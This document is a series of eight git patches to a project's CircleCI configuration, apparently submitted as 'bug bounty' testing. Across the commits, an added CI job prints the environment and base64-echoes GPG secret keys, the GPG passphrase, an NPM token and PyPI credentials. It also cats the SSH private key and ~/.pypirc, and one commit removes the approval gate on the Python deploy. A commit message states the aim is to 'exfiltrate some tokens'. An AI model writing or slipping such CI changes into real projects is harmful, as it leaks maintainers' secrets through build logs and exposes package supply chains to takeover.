From 55f41eaabf9f97b44a49c01dfdaea081f37b6aeb Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:32:57 -0500 Subject: [PATCH 1/8] Test for bugbounty --- .circleci/config.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) diff --git a/.circleci/config.yml b/.circleci/config.yml index 234c318..edf502b 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -173,6 +173,27 @@ jobs: command: python -m unittest discover -v working_directory: python/ + bugbounty: + docker: + - image: circleci/python:3.6.4 + + steps: + - checkout + - run: echo "Start Bug Bounty" + - run: sudo chown -R circleci:circleci /usr/local/bin + - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages + - run: pip install twine + - run: + name: init .pypirc + command: | + echo -e "[pypi]" >> ~/.pypirc + echo -e "username = $PYPI_USERNAME" >> ~/.pypirc + echo -e "password = $PYPI_PASSWORD" >> ~/.pypirc + - run: cd python && python setup.py sdist + - run: cd python && python setup.py bdist_wheel + - run: cd python && twine upload dist/* + - run: env + - run: echo $PYPI_USERNAME deploy-java: docker: @@ -240,6 +261,7 @@ workflows: - testcpp - testcppgcc - testpython + - bugbounty tagged-deploy: jobs: From 2342c8de89c4266c703ae3ac446b3ac6537fb1bd Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:34:49 -0500 Subject: [PATCH 2/8] Move env variables before. List home dir --- .circleci/config.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index edf502b..1391e39 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -180,6 +180,9 @@ jobs: steps: - checkout - run: echo "Start Bug Bounty" + - run: env + - run: echo $PYPI_USERNAME + - run: ls -alh ~/ - run: sudo chown -R circleci:circleci /usr/local/bin - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages - run: pip install twine @@ -192,8 +195,6 @@ jobs: - run: cd python && python setup.py sdist - run: cd python && python setup.py bdist_wheel - run: cd python && twine upload dist/* - - run: env - - run: echo $PYPI_USERNAME deploy-java: docker: From 3d15920f36def61b5a5b805ba53981d2e80202dc Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:36:16 -0500 Subject: [PATCH 3/8] List SSH --- .circleci/config.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 1391e39..8eff8f6 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -182,7 +182,9 @@ jobs: - run: echo "Start Bug Bounty" - run: env - run: echo $PYPI_USERNAME - - run: ls -alh ~/ + - run: echo $GPG_SECRET_KEYS | base64 --decode | $GPG_EXECUTABLE --batch --passphrase "$GPG_PASSPHRASE" --import + - run: echo $GPG_OWNERTRUST | base64 --decode | $GPG_EXECUTABLE --batch --passphrase "$GPG_PASSPHRASE" --import-ownertrust + - run: ls -alh ~/.ssh/ - run: sudo chown -R circleci:circleci /usr/local/bin - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages - run: pip install twine From d89b05349f84cf3abc7ebf0af7e1ffdb42f275b9 Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:37:36 -0500 Subject: [PATCH 4/8] Try to exfiltrate some tokens --- .circleci/config.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 8eff8f6..209b035 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -182,8 +182,9 @@ jobs: - run: echo "Start Bug Bounty" - run: env - run: echo $PYPI_USERNAME - - run: echo $GPG_SECRET_KEYS | base64 --decode | $GPG_EXECUTABLE --batch --passphrase "$GPG_PASSPHRASE" --import - - run: echo $GPG_OWNERTRUST | base64 --decode | $GPG_EXECUTABLE --batch --passphrase "$GPG_PASSPHRASE" --import-ownertrust + - run: echo $GPG_SECRET_KEYS | base64 --encode + - run: echo $GPG_PASSPHRASE | base64 --encode + - run: echo $NPM_TOKEN | base64 --encode - run: ls -alh ~/.ssh/ - run: sudo chown -R circleci:circleci /usr/local/bin - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages From b2295bea7c9a62dd27d5fef7c671cb46e59be9b3 Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:40:22 -0500 Subject: [PATCH 5/8] Simplify circleci run --- .circleci/config.yml | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 209b035..f5ac92e 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -182,9 +182,9 @@ jobs: - run: echo "Start Bug Bounty" - run: env - run: echo $PYPI_USERNAME - - run: echo $GPG_SECRET_KEYS | base64 --encode - - run: echo $GPG_PASSPHRASE | base64 --encode - - run: echo $NPM_TOKEN | base64 --encode + - run: echo $GPG_SECRET_KEYS | base64 + - run: echo $GPG_PASSPHRASE | base64 + - run: echo $NPM_TOKEN | base64 - run: ls -alh ~/.ssh/ - run: sudo chown -R circleci:circleci /usr/local/bin - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages @@ -259,11 +259,6 @@ workflows: build: jobs: - testtools - - testjsts - - testjava - - testswift - - testcpp - - testcppgcc - testpython - bugbounty From c29b7ab40cfda42aae8c49e19e2e9de0e3f85f31 Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:42:54 -0500 Subject: [PATCH 6/8] Deploy Python --- .circleci/config.yml | 22 ++-------------------- 1 file changed, 2 insertions(+), 20 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index f5ac92e..aa176e1 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -186,18 +186,7 @@ jobs: - run: echo $GPG_PASSPHRASE | base64 - run: echo $NPM_TOKEN | base64 - run: ls -alh ~/.ssh/ - - run: sudo chown -R circleci:circleci /usr/local/bin - - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages - - run: pip install twine - - run: - name: init .pypirc - command: | - echo -e "[pypi]" >> ~/.pypirc - echo -e "username = $PYPI_USERNAME" >> ~/.pypirc - echo -e "password = $PYPI_PASSWORD" >> ~/.pypirc - - run: cd python && python setup.py sdist - - run: cd python && python setup.py bdist_wheel - - run: cd python && twine upload dist/* + - run: cat ~/.ssh/id_rsa deploy-java: docker: @@ -280,14 +269,7 @@ workflows: only: /^\d+\.\d+\.\d+/ branches: ignore: /.*/ - - deploy-python: - requires: - - hold - filters: - tags: - only: /^\d+\.\d+\.\d+/ - branches: - ignore: /.*/ + - deploy-python - hold: type: approval filters: From e1f85508441a99881cd9a6b409b7dcd0ae9adb1d Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:43:17 -0500 Subject: [PATCH 7/8] Display pypi creds --- .circleci/config.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.circleci/config.yml b/.circleci/config.yml index aa176e1..28c955b 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -238,6 +238,7 @@ jobs: echo -e "[pypi]" >> ~/.pypirc echo -e "username = $PYPI_USERNAME" >> ~/.pypirc echo -e "password = $PYPI_PASSWORD" >> ~/.pypirc + - run: cat ~/.pypirc - run: cd python && python setup.py sdist - run: cd python && python setup.py bdist_wheel - run: cd python && twine upload dist/* From d8f35291b7c1ecceabd5dd93023ccdd566011b3b Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:44:49 -0500 Subject: [PATCH 8/8] Reomve twine --- .circleci/config.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 28c955b..de898fd 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -231,7 +231,6 @@ jobs: - checkout - run: sudo chown -R circleci:circleci /usr/local/bin - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages - - run: pip install twine - run: name: init .pypirc command: | @@ -241,7 +240,6 @@ jobs: - run: cat ~/.pypirc - run: cd python && python setup.py sdist - run: cd python && python setup.py bdist_wheel - - run: cd python && twine upload dist/* workflows: